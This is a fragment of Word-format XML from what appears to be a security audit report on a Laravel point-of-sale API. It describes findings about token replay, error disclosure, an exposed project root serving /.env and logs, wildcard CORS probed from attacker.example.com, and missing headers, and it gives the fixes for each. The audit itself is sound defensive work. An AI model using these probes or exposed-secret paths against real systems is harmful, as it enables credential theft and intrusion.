    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="430" w:hanging="430"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the OLD token is replayed   → GET /me 200, still fully authorised</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="429" w:hanging="257"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With no expiry, that access was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">permanent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. A dismissed employee kept the ability to read customer records and cost prices and to cancel invoices. The personal_access_tokens table always had an expires_at column; nothing ever set it. This is also what made V-13 catastrophic rather than merely serious: a token stolen by XSS was good forever.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">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Fixed:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8-hour expiry (one shop shift), configurable. Role-scoped abilities instead of ['*'] . Prior tokens revoked on login one person, one active session, which is right for a till and means a stolen token dies when the real user next signs in. Tokens revoked on deactivation, role change, username change and password change, each with an audit entry naming the reason. A new EnsureUserIsActive middleware re-checks on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">every</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> request as a backstop for anything that flips is_active without going through the controller. POST /logout-all for a user who suspects compromise.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">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A pubudupos_ token prefix was added so GitHub's secret scanning can recognise a leaked token  relevant for a project that had already committed a .env .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">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Verified:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Token replayed after deactivation → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">401</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EE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="280" w:line="402" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="5278"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V-07 · Error, source and log disclosure </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="60" w:before="280" w:line="402" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="5278"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OWASP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A05:2021 · </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-209</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CWE-538</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CWE-552</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>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High</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">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Three separate paths.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="221" w:hanging="221"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Raw exception text returned regardless of APP_DEBUG</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> at ten call sites. Observed:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="182" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/reports/carts → 500</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{"message":"Class \"App\\Models\\Cart\" not found","exception":"Error", "file":"…\\app\\Http\\Controllers\\Api\\ReportController.php","line":23}A PUT /customers/1 leaked the full SQL statement, database name, table and foreign-key constraint name. Notably GrnController already gated its messages behind config('app.debug') the correct pattern was known and applied inconsistently.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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The entire project directory served over HTTP.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> index.php and .htaccess were copied from public/ to the repository root so the app would run with the document root at the project root. The copy was verbatim, carrying no access rules and because the front-controller rewrite only fires for paths that do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> exist ( RewriteCond %{REQUEST_FILENAME} !f ), every file that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">does</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> exist was served as-is: /.env (DB password, APP_KEY , OneSignal REST key), /composer.lock ,/storage/logs/laravel.log , /database/migrations/* , /app/** . APP_KEY alone signs and encrypts every Laravel cookie and signed URL.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Runtime logs committed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the repository, and downloadable per (2).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">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Two endpoints additionally returned 500 on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">every</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> call, which is what made (1) trivially reachable:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">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ReportController::cartsReport referenced App\Models\Cart , a class that does not exist, and routes/api.php:161 pointed at a show() method that was never written.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7">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A single uniform JSON error contract in Handler::render() , so an individual controller can no longer get it wrong: unexpected faults return a generic message plus a correlation UUID, with the full exception always logged and detail attached only when config('app.debug') is explicitly true. All ten ungated messages gated. The root .htaccess hardened to deny dotfiles, application directories, project metadata and source/data/log extensions  using mod_rewrite because&lt;Files&gt; / &lt;Directory&gt; are frequently disabled in shared-hosting contexts. Logs removed from tracking, .gitignore extended. .env copy.example renamed to .env.example and hardened: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8">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it shipped APP_ENV=local and APP_DEBUG=true </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is exactly what Composer's post-root-package-install copies into .env automatically. The dead Cart report deleted; show() implemented; the written-but-unrouted cancel() routed.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9">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V-08 · CORS accepted every origin &amp; V-09 / V-18 · No security headers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="192" w:before="280" w:line="265"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A05:2021 · </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-942</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CWE-693</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Medium</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="10"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config/cors.php:22 'allowed_origins' =&gt; ['*'] , confirmed: Origin: https://attacker.example.com → AccessControl-Allow-Origin: * . Combined with the unauthenticated /register (V-01), that alone was enough to create an admin account from a drive-by page.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">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Neither tier sent </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">any</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> security header: no CSP, no X-Frame-Options (clickjackable), no HSTS, no nosniff , no ReferrerPolicy .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">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CORS origins from an explicit FRONTEND_URLS allow-list with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no wildcard fallback</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a missing environment variable must fail closed, not silently restore the vulnerability. A global SecurityHeaders middleware registered in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">global</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> stack rather than a route group, so 404s, 405s, throttle 429s and exception responses are covered too. A headers block in vercel.json with a real CSP, which is also the defence-in-depth layer behind V-13.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE">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HSTS is emitted </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">only</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> over TLS: RFC 6797 §7.2 forbids sending it over plain HTTP, and emitting it on a local dev server would pin developers' browsers to HTTPS for localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="10"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Known limitation:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> style-src retains 'unsafe-inline' . Tailwind and the print templates emit inline style attributes, and removing it needs a nonce-based build pipeline. Residual risk is CSS injection, not script execution.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">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V-10 · The client dictated the selling price, and the discount workflow was decorative</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="161" w:before="280" w:line="259"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A04:2021 Insecure Design / API6:2023 · </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
